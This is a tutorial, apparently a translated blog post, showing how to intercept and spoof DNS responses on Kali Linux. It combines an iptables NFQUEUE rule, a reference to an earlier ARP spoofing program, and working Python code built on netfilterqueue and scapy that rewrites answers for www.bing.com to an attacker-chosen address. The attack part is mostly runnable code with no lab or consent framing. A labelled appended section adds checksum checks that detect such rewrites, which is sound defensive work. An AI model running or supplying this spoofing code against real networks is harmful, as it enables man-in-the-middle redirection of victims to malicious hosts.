Using Python's third-party netfilterqueue module to implement a packet proxy and a DNS spoofing program
This article implements a proxy program that intercepts and modifies packets using the Python third-party module netfilterqueue. The NetfilterQueue module provides access to packets on Kali Linux that are matched by iptables rules. Packets matched this way can be accepted (accept), dropped (drop), modified, reordered, or given a mark.
First, use iptables on Kali Linux to create a packet-handling rule that places received packets into a queue; otherwise the packets would be forwarded before scapy has a chance to process them. Then use the scapy module to match and modify the packets in the queue. The iptables chain used here is FORWARD, that is, the rule applies to packets forwarded from other machines to Kali Linux (by means of spoofing).
# iptables -I FORWARD -j NFQUEUE --queue-num 0    (this queue-num must match the number used later in the program)
Start the arpspoofy program written earlier so that the target's packets are redirected to Kali Linux via ARP spoofing, then use the program below to process the packets in the queue: first identify the DNS response packets, then modify the relevant fields of the packet to carry out the DNS spoofing:
import netfilterqueue
from scapy.all import *


def packet_handler(pkt):
    # Convert pkt to a scapy packet so it can be analysed and modified
    scapy_packet = IP(pkt.get_payload())  # the packet captured by netfilterqueue must be converted to a scapy packet for analysis and modification
    if scapy_packet.haslayer(DNSRR):  # only modify returned DNS response packets
        qname = scapy_packet[DNSQR].qname.decode('utf-8')  # qname is bytes here and needs UTF-8 decoding
        print(qname)
        if 'www.bing.com' in qname:
            print("Spoofing the target!!!!!!!!!!!!!")
            answer = DNSRR(rrname=qname, rdata='192.168.140.138')
            scapy_packet[DNS].an = answer
            scapy_packet[DNS].ancount = 1
            del scapy_packet[IP].len  # the DNS response was modified, so the length and checksum fields of the IP header and UDP header must change; the simple way is to delete them and let scapy recompute them automatically
            del scapy_packet[IP].chksum
            del scapy_packet[UDP].len
            del scapy_packet[UDP].chksum
            # print(scapy_packet.show())
            pkt.set_payload(bytes(scapy_packet))
    pkt.accept()


queue = netfilterqueue.NetfilterQueue()
queue.bind(0, packet_handler)
queue.run()
For reference, the content of a DNS response packet is shown below:
###[ IP ]###
  version   = 4
  ihl       = 5
  tos       = 0x0
  len       = 284
  id        = 21095
  flags     =
  frag      = 0
  ttl       = 127
  proto     = udp
  chksum    = 0x8b25
  src       = 8.8.8.8
  dst       = 192.168.140.140
  \options   \
###[ UDP ]###
     sport     = domain
     dport     = 60936
     len       = 264
     chksum    = 0x168f
###[ DNS ]###
        id        = 40404
        qr        = 1
        opcode    = QUERY
        aa        = 0
        tc        = 0
        rd        = 1
        ra        = 1
        z         = 0
        ad        = 0
        cd        = 0
        rcode     = ok
        qdcount   = 1
        ancount   = 6
        nscount   = 0
        arcount   = 0
        \qd        \
         |###[ DNS Question Record ]###
         |  qname     = 'api.onedrive.com.'
         |  qtype     = A
         |  qclass    = IN
        \an        \
         |###[ DNS Resource Record ]###
         |  rrname    = 'api.onedrive.com.'
         |  type      = CNAME
         |  rclass    = IN
         |  ttl       = 843
         |  rdlen     = None
         |  rdata     = 'common-afdrk.fe.1drv.com.'
         |###[ DNS Resource Record ]###
         |  rrname    = 'common-afdrk.fe.1drv.com.'
         |  type      = CNAME
         |  rclass    = IN
         |  ttl       = 33
         |  rdlen     = None
         |  rdata     = 'odc-commonafdrk-geo.onedrive.akadns.net.'
         |###[ DNS Resource Record ]###
         |  rrname    = 'odc-commonafdrk-geo.onedrive.akadns.net.'
         |  type      = CNAME
         |  rclass    = IN
         |  ttl       = 14
         |  rdlen     = None
         |  rdata     = 'odc-commonafdrk-brs.onedrive.akadns.net.'
         |###[ DNS Resource Record ]###
         |  rrname    = 'odc-commonafdrk-brs.onedrive.akadns.net.'
         |  type      = CNAME
         |  rclass    = IN
         |  ttl       = 14
         |  rdlen     = None
         |  rdata     = 'common.be.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net.'
         |###[ DNS Resource Record ]###
         |  rrname    = 'common.be.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net.'
         |  type      = CNAME
         |  rclass    = IN
         |  ttl       = 25
         |  rdlen     = None
         |  rdata     = 'l-0003.l-msedge.net.'
         |###[ DNS Resource Record ]###
         |  rrname    = 'l-0003.l-msedge.net.'
         |  type      = A
         |  rclass    = IN
         |  ttl       = 25
         |  rdlen     = None
         |  rdata     = 13.107.42.12
        ns        = None
        ar        = None
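The comment in the program above explains that the IP and UDP len and chksum fields are deleted so that scapy recomputes them. The following added example (not part of the original post, and independent of scapy and netfilterqueue) shows what those fields have to satisfy: it builds a minimal DNS-over-UDP response with correct length and checksum fields, then checks them, so a response whose answer section was rewritten in place without recomputation is flagged. The addresses, ports, transaction id and DNS payload are constructed sample values; the check is the kind a passive DNS monitor can apply to responses seen on the wire.

```python
import struct

def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 checksum; returns 0 when run over data whose checksum field is already correct."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def udp_checksum(src: bytes, dst: bytes, udp: bytes) -> int:
    """UDP checksum covers the IPv4 pseudo-header (src, dst, zero, proto 17, UDP length) plus the datagram."""
    return ones_complement_sum(src + dst + struct.pack("!BBH", 0, 17, len(udp)) + udp)

def dns_name(name: str) -> bytes:
    return b"".join(bytes([len(label)]) + label.encode() for label in name.strip(".").split(".")) + b"\x00"

def dns_a_reply(txid: int, qname: str, ip: str) -> bytes:
    """Constructed sample DNS response: one question and one A answer (not a captured packet)."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = dns_name(qname) + struct.pack("!HH", 1, 1)
    answer = dns_name(qname) + struct.pack("!HHIH", 1, 1, 60, 4) + bytes(int(o) for o in ip.split("."))
    return header + question + answer

def build_dns_reply(src: bytes, dst: bytes, sport: int, dport: int, payload: bytes) -> bytes:
    """Wrap payload in UDP and IPv4, filling the len and chksum fields that scapy recomputes when deleted."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    udp = udp[:6] + struct.pack("!H", udp_checksum(src, dst, udp)) + udp[8:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 1, 0, 64, 17, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", ones_complement_sum(ip)) + ip[12:]
    return ip + udp

def check_packet(raw: bytes) -> dict:
    """Report whether the IP/UDP length and checksum fields agree with the bytes actually present."""
    ihl = (raw[0] & 0x0F) * 4
    udp = raw[ihl:]
    return {
        "ip_len": struct.unpack("!H", raw[2:4])[0] == len(raw),
        "ip_chksum": ones_complement_sum(raw[:ihl]) == 0,
        "udp_len": struct.unpack("!H", udp[4:6])[0] == len(udp),
        "udp_chksum": udp_checksum(raw[12:16], raw[16:20], udp) == 0,
    }

if __name__ == "__main__":
    SRC, DST = bytes([8, 8, 8, 8]), bytes([192, 168, 140, 140])  # constructed resolver/client addresses
    good = build_dns_reply(SRC, DST, 53, 60936, dns_a_reply(0x9DD4, "www.bing.com", "13.107.21.200"))
    stale = good[:-4] + bytes([192, 168, 140, 138])  # rdata rewritten in place, checksum left stale
    print(check_packet(good), check_packet(stale))
```

A rewrite that changes the answer section but leaves the old checksum in place fails the udp_chksum check, and one that changes the packet size without updating the len fields fails the length checks as well.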